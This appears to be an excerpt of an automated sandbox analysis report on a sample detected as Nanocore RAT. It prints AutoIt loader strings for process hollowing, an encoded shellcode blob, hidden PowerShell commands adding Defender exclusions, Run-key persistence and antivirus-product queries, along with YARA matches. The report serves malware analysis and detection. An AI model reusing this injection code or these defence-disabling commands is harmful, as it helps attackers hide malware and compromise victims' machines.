Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfuncu
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)p
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")\
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"i
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)m
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953~
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6!
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6[
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ed
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6u
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: btklr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0xh*5z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0x6,5
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \rings
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: array
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: le3t?
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_sz
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: runonce0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6-
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: arrayslist
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptdir
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002B1A91

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00253312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

7_2_00253312

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BEBB3 mouse_event,

7_2_002BEBB3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_002B1EF3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002B13F2

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007228000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000000.395755947.0000000000313000.00000002.00000001.01000000.0000000A.sdmp, boaliim.dat.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: boaliim.dat	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerD$
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.649636221.0000000006E6C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Managerp
Source: RegSvcs.exe, 0000000D.00000002.633864809.0000000001ABE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Manager
Source: RegSvcs.exe, 0000000D.00000002.652061665.0000000007DBE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerJ
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\2
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000038E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerHa

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0096AF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F654 cpuid

0_2_0096F654

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

0_2_0096DF1E

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_0028BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

7_2_0028BCF2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002AE5F8 GetUserNameW,

7_2_002AE5F8

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0095B146 GetVersionExW,

0_2_0095B146

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

AV process strings found (often used to terminate AV products)

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
